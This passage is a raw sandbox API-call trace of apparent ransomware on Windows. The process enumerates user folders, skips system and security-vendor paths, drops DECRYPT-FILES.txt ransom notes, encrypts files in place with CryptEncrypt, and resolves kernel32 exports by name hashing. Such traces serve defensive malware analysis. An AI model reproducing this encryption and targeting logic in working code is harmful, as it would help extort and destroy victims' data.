lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed64aa0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaed64aa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaed64aa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0084.963] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0084.963] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0084.963] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0084.963] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0084.963] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0084.963] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0084.963] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed64aa0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaed64aa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaed64aa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0084.963] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0084.963] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0084.963] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0084.963] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0084.963] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0084.963] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0084.963] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0084.963] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0084.963] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0084.963] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0084.963] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.963] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0084.963] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0084.963] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0084.963] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0084.963] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned 40 [0084.963] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.963] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\" [0084.963] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\jkbimi8.tmp" [0084.963] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.964] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0084.964] CloseHandle (hObject=0x0) returned 0 [0084.964] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.964] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0084.964] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0084.964] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0084.964] lstrcatW (in: lpString1="Links", lpString2="\\" | out: lpString1="Links\\") returned="Links\\" [0084.964] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\", lpString2="Links\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0084.964] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="\\Program Files") returned 0x0 [0084.964] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch=":\\Windows") returned 0x0 [0084.964] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="\\Games\\") returned 0x0 [0084.964] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="\\Tor Browser\\") returned 0x0 [0084.964] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="\\ProgramData\\") returned 0x0 [0084.964] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0084.964] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0084.964] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0084.965] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="\\All Users") returned 0x0 [0084.965] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="\\IETldCache\\") returned 0x0 [0084.965] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="\\Local Settings\\") returned 0x0 [0084.965] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="\\AppData\\Local") returned 0x0 [0084.965] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="AhnLab") returned 0x0 [0084.965] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0084.965] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 46 [0084.965] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.965] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\\\jkbimi8.tmp") returned 58 [0084.965] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0084.965] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 46 [0084.965] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0084.965] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\\\DECRYPT-FILES.txt") returned 64 [0084.965] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0084.968] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0084.969] CloseHandle (hObject=0x414) returned 1 [0084.970] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 46 [0084.970] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*" [0084.970] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaed64aa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaed64aa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c98 [0084.970] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.970] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaed64aa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaed64aa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.971] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.971] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.971] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed64aa0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaed64aa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaed64aa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0084.971] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0084.971] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0084.971] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0084.971] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0084.971] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0084.971] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0084.971] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaed64aa0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaed64aa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaed64aa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0084.971] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0084.971] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0084.971] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0084.971] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0084.971] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0084.971] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0084.971] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0084.971] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0084.971] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0084.971] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0084.971] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.971] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0084.971] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0084.971] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0084.971] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0084.971] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 46 [0084.971] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.971] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0084.971] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\jkbimi8.tmp" [0084.971] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.972] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0084.972] CloseHandle (hObject=0x0) returned 0 [0084.972] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.972] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0x0, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0084.972] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="DECRYPT-FILES.txt") returned 1 [0084.972] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="autorun.inf") returned 1 [0084.972] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="boot.ini") returned 1 [0084.972] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="desktop.ini") returned 1 [0084.972] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="ntuser.dat") returned 1 [0084.972] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="iconcache.db") returned 1 [0084.972] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="bootsect.bak") returned 1 [0084.972] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="ntuser.dat.log") returned 1 [0084.972] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="thumbs.db") returned -1 [0084.972] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="Bootfont.bin") returned 1 [0084.972] lstrlenW (lpString="Suggested Sites.url") returned 19 [0084.972] lstrcmpiW (lpString1="url", lpString2="lnk") returned 1 [0084.972] lstrcmpiW (lpString1="url", lpString2="exe") returned 1 [0084.972] lstrcmpiW (lpString1="url", lpString2="sys") returned 1 [0084.972] lstrcmpiW (lpString1="url", lpString2="dll") returned 1 [0084.972] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned 46 [0084.972] lstrlenW (lpString="Suggested Sites.url") returned 19 [0084.973] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\" [0084.973] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpString2="Suggested Sites.url" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" [0084.973] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.973] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0084.974] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=236) returned 1 [0084.974] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0084.974] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.974] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.974] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.974] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.979] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0084.979] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.980] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.980] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.980] CloseHandle (hObject=0x42c) returned 1 [0084.980] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.980] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0084.981] CloseHandle (hObject=0x0) returned 0 [0084.981] CloseHandle (hObject=0x428) returned 1 [0084.981] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.981] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.982] GetTickCount () returned 0x114db42 [0084.982] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.982] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.982] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.982] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.982] lstrlenA (lpString="kernel32.dll") returned 12 [0084.983] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.983] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.983] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.983] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.983] lstrlenA (lpString="ADDATOMA") returned 8 [0084.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.983] lstrlenA (lpString="ADDATOMW") returned 8 [0084.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.983] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.983] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.983] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.983] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.983] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.983] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.983] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.983] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.983] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.983] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.983] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.983] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.984] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.984] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.984] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.984] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.984] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.984] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" 